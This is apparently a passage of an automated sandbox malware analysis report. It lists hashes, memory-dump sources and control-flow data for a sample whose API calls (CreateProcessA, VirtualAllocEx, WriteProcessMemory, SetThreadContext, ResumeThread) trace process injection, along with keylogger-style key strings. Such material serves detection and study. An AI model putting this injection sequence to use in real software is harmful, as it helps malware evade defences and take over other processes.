                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: State
                                                                                                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                                                                                                              • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                                                                                              • String ID: J@4fF
                                                                                                                                                                                              • API String ID: 2654517830-1060276034
                                                                                                                                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                              • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                              • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:10.4%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:182
                                                                                                                                                                                              Total number of Limit Nodes:4
execution_graph: node and edge listing of the rendered execution graph (the graph image itself is not recoverable from this text). API calls reached from the listed nodes: PostMessageW, GetModuleHandleW, CreateActCtxA, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateProcessA, ResumeThread, WriteProcessMemory, Wow64SetThreadContext, VirtualAllocEx, ReadProcessMemory.

                                                                                                                                                                                              Control-flow Graph

Rendered control-flow graph (legend: Executed / Not Executed) not recoverable; basic-block edge listing covered 13bda60-13bdc2d with calls to GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId.
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 013BDADE
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 013BDB1B
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 013BDB58
                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 013BDBB1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                                                                              • Opcode ID: f42e18d88b127cb5d22e472f5b71af9837f4b67dc0ab075b28c039847244f9da
                                                                                                                                                                                              • Instruction ID: 139bb375163ab781c1a5d34a02e22ecd727857a7ba27d6adf248d93d21d7a7fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: f42e18d88b127cb5d22e472f5b71af9837f4b67dc0ab075b28c039847244f9da
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F5154B09002098FDB54DFAAD588BDEBBF1BF88318F20C459D519A7360D774A884CF65

                                                                                                                                                                                              Control-flow Graph

Rendered control-flow graph (legend: Executed / Not Executed) not recoverable; basic-block edge listing covered 78306df-7830a2d with a call to CreateProcessA.
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0783091E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                              • Opcode ID: ef91c398262c6dd4d3e2e745ce3a29073baddf398fa4bf783b727fb376f6d2c6
                                                                                                                                                                                              • Instruction ID: 081832a7393f11b936918bd40212dfa45b1297d2409bf3e522dfdbb555ef9629
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef91c398262c6dd4d3e2e745ce3a29073baddf398fa4bf783b727fb376f6d2c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 86913AB1D0021ADFEB24DF68C8417EEBBB2EF54314F1481A9E848E7240DB759985CF92

                                                                                                                                                                                              Control-flow Graph

Rendered control-flow graph (legend: Executed / Not Executed) not recoverable; basic-block edge listing covered 78306e8-7830a2d with a call to CreateProcessA.
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0783091E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                              • Opcode ID: e9891a40b6bffa5db805cfbde1f9833fb79621474be1ec59a31b68c97b0ea4ff
                                                                                                                                                                                              • Instruction ID: 6e424a9483f286bd998f0a52e3921a12eb5472f24d55375900f03366e1df5bd6
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9891a40b6bffa5db805cfbde1f9833fb79621474be1ec59a31b68c97b0ea4ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B9149B1D0021ADFEB24DFA8C8417EEBBB2BF44314F1481A9D848E7240DB759985CF92

                                                                                                                                                                                              Control-flow Graph

Rendered control-flow graph (legend: Executed / Not Executed) not recoverable; basic-block edge listing covered 13b44c4-13b5a41 with a call to CreateActCtxA.
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013B59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: 7bacae7cae5c2172091cecbdad10858e2d4193996eee0afe2e841c829d911e73
                                                                                                                                                                                              • Instruction ID: 00e986788f774bdc3ecbe75802fc53025b6d3c14ea83f48e1ff96e99f231a622
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bacae7cae5c2172091cecbdad10858e2d4193996eee0afe2e841c829d911e73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1241D2B0C0071DCBDB24DFA9C884ADEBBB6BF49304F24806AD509BB255EB756945CF90

Control-flow Graph
control_flow_graph 703 13b58f3-13b59b9 CreateActCtxA 705 13b59bb-13b59c1 703->705 706 13b59c2-13b5a1c 703->706 705->706 713 13b5a2b-13b5a2f 706->713 714 13b5a1e-13b5a21 706->714 715 13b5a31-13b5a3d 713->715 716 13b5a40 713->716 714->713 715->716 717 13b5a41 716->717 717->717
APIs
• CreateActCtxA.KERNEL32(?), ref: 013B59A9
Memory Dump Source
• Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 8197671a50b251b6689d9c5a882157c94db8beb7068949b895f2d20de13a2f76
• Instruction ID: 7745a937e8b2724f436944f1c8022858f048027415c9429c52fc5cba042bed4d
• Opcode Fuzzy Hash: 8197671a50b251b6689d9c5a882157c94db8beb7068949b895f2d20de13a2f76
• Instruction Fuzzy Hash: 7941C1B0C00719CEEB24DFA9C884BDDBBB6BF49304F24806AD509AB255EB756945CF90

Control-flow Graph
control_flow_graph 719 7830459-783045a 720 7830461-7830464 719->720 721 783045c-783045e 719->721 723 7830465-78304ae 720->723 722 7830460 721->722 721->723 722->720 725 78304b0-78304bc 723->725 726 78304be-78304fd WriteProcessMemory 723->726 725->726 728 7830506-7830536 726->728 729 78304ff-7830505 726->729 729->728
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078304F0
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 049554db287c96da624e7b9342dd816fb57f7cd486aba450ec273cae81a2608b
• Instruction ID: d0a57ff8085c15a83ff034868cd8d68349a318de689b892a8c7c0c7e6e0c0755
• Opcode Fuzzy Hash: 049554db287c96da624e7b9342dd816fb57f7cd486aba450ec273cae81a2608b
• Instruction Fuzzy Hash: BD2157B19003599FDB10CFADC884BDEBBF1FF48314F10842AE559A7250C7789544CBA4

Control-flow Graph
control_flow_graph 733 7830460-78304ae 737 78304b0-78304bc 733->737 738 78304be-78304fd WriteProcessMemory 733->738 737->738 740 7830506-7830536 738->740 741 78304ff-7830505 738->741 741->740
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078304F0
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 8328792dcc649ed9f3b06b1ee270910c08f2871df4ceb16645b64409e145e065
• Instruction ID: 77b4c530a2c9c01e28306bc3f0607ea6e398dda25177c485f1815ceb8ceb0763
• Opcode Fuzzy Hash: 8328792dcc649ed9f3b06b1ee270910c08f2871df4ceb16645b64409e145e065
• Instruction Fuzzy Hash: 242125B19003599FDB10CFAAC885BDEBBF5FF48324F10842AE959A7250C7789944CBA4

Control-flow Graph
control_flow_graph 745 7830548-783054a 746 7830551-78305dd ReadProcessMemory 745->746 747 783054c-783054f 745->747 750 78305e6-7830616 746->750 751 78305df-78305e5 746->751 747->746 751->750
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078305D0
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: c4c70434e85072afd2c39e072b994103075ad68dbbe860c8562c0029751d5eee
• Instruction ID: 7e5c60edd2f66b7fce96d289a51fd9cd54e5e467d50e47127f10bfd0ceac62d7
• Opcode Fuzzy Hash: c4c70434e85072afd2c39e072b994103075ad68dbbe860c8562c0029751d5eee
• Instruction Fuzzy Hash: BC2166B1C002599FCB10CFA9C881BEEBBF1FF48320F10842AE559A7250C7789941CBA0

Control-flow Graph
control_flow_graph 755 78302c0-78302c6 756 78302c8-78302cc 755->756 757 78302cd-7830313 755->757 756->757 759 7830323-7830353 Wow64SetThreadContext 757->759 760 7830315-7830321 757->760 762 7830355-783035b 759->762 763 783035c-783038c 759->763 760->759 762->763
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07830346
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: f72ceeaa0225cc9494fbf2092b30650ff85f54989de589d9e44c9a2654095f40
• Instruction ID: 2babee15ba6d16b90bf36dc67a5ea913aac044aa3b9b23ed4a613d6b05235696
• Opcode Fuzzy Hash: f72ceeaa0225cc9494fbf2092b30650ff85f54989de589d9e44c9a2654095f40
• Instruction Fuzzy Hash: 642168B19003099FDB10DFAEC584BEEBBF5EF48324F108429D459A7241C778A944CFA5

Control-flow Graph
control_flow_graph 767 78302c8-7830313 770 7830323-7830353 Wow64SetThreadContext 767->770 771 7830315-7830321 767->771 773 7830355-783035b 770->773 774 783035c-783038c 770->774 771->770 773->774
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07830346
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: d6d8260dcada9f54cdb709c2afa60ef6be8713e80e630c4ec19a30544922938a
• Instruction ID: 97eff09deea74a06f97e32fd07bad014454cb2d41928507309512a0105fe41a5
• Opcode Fuzzy Hash: d6d8260dcada9f54cdb709c2afa60ef6be8713e80e630c4ec19a30544922938a
• Instruction Fuzzy Hash: BB2138B19003098FDB10DFAAC5857EEBBF5EF48324F148429D559A7240C7789945CFA5

Control-flow Graph
control_flow_graph 778 7830550-78305dd ReadProcessMemory 782 78305e6-7830616 778->782 783 78305df-78305e5 778->783 783->782
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078305D0
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 61c82d662dffaf31ebf8513059c810863e62507d4f1a1282a68e225ec0d66c50
• Instruction ID: c901c1ee9f916fb1d6f8968e5da612564e3baee55aec31740f47ff32a807c2a2
• Opcode Fuzzy Hash: 61c82d662dffaf31ebf8513059c810863e62507d4f1a1282a68e225ec0d66c50
• Instruction Fuzzy Hash: 622125B18002599FCB10DFAAC881AEEFBF5FF48320F10842AE559A7250C7789944CBA4

Control-flow Graph (three basic blocks: 787 at 13bdca8-13bdd3c, which calls DuplicateHandle; 788 at 13bdd3e-13bdd44; 789 at 13bdd45-13bdd62; edges 787->788, 787->789, 788->789)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BDD2F
Memory Dump Source
• Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0783040E
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0783040E
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 07832F5D
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 013BBA1E
Memory Dump Source
• Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 013BBA1E
Memory Dump Source
• Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 07832F5D
Memory Dump Source
• Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7830000_graias.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Memory Dump Source
• Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_135d000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                              • Opcode ID: 63c780536816bc41141da11d278a1818f180b8ba97a85ca5758953ca56c6c730
                                                                                                                                                                                              • Instruction ID: cd2d6142a2312f70337e7fd9903361fbc13a51d92062228ea1789091cef3b67e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c780536816bc41141da11d278a1818f180b8ba97a85ca5758953ca56c6c730
                                                                                                                                                                                              • Instruction Fuzzy Hash: 422145B1100204DFDB05DF48D9C0F66BF69FB88728F20C169ED0A1F256C73AE446CAA2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0272f5d87cace8d34f0b1df9ce90c13459a7aa73c07102192e55acef3514c0b0
                                                                                                                                                                                              • Instruction ID: b0a9f46b02944fb82c1ac519e82dec664bdb1bb64849972fe17c0d8ccccf6b60
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0272f5d87cace8d34f0b1df9ce90c13459a7aa73c07102192e55acef3514c0b0
                                                                                                                                                                                              • Instruction Fuzzy Hash: D82122B1500244DFDB46DF98D9C0F2ABF65FB88B1CF20C969ED094B256C336D456CAA2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1e60aaac98bc05f1c4c2646aa585b22e54bdc936f3ba1a6a0bcc7965b9c741ea
                                                                                                                                                                                              • Instruction ID: da978cb5a687dc81b0a90118410b493fde5a475328e1c12a1d8d792692a74d65
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e60aaac98bc05f1c4c2646aa585b22e54bdc936f3ba1a6a0bcc7965b9c741ea
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9214971604204DFDB01DF98D5C0B26BBA9FB84328F24C56DD8894B35AC376D446CA61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ab44fe2c28a2211e9bb0077d1d60150dcc8e48cd1b21f9143a624fdb1720ed54
                                                                                                                                                                                              • Instruction ID: a1c59ffb96c9b1cc01344cbb5ac3649d9b57e289a5145608920634a287bdf2d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab44fe2c28a2211e9bb0077d1d60150dcc8e48cd1b21f9143a624fdb1720ed54
                                                                                                                                                                                              • Instruction Fuzzy Hash: 46212271604204DFCB15DF58D984B26BFA9FB88318F20C56DE88A4B25AC33BD447CAA1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction ID: ab70486e1774aa029113ffab462252317e64b135cdc7ce6b19545c19f6d54438
                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11E172404280CFCB02CF54D5C4B16BF71FB84718F24C6A9DC090B256C336D45ACBA1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction ID: 1dcfb9f5729b20969fb1ea3f1911263b4be37f0c1e20086751f3fa9d6f8b5a18
                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11DFB2404240CFDB06CF44D5C4B56BF72FB94328F24C2A9DD090B256C33AE45ACBA1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction ID: 22fdd415041c999ff4073b269bc957c6c2b1eba0636b8b5d13b1634b6085226f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D118E75604280DFDB16CF54D5C4B15BF71FB84318F24C6AAD8494B65AC33AD44ACB61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction ID: 9c0f1c3b6504844234759444ca9969704fd856f00bfd715c5c213d26a92da93b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32118B75604280DFDB16CF54D5C4B15BFB1FB84228F28C6AAD8894B69AC33AD44ACB61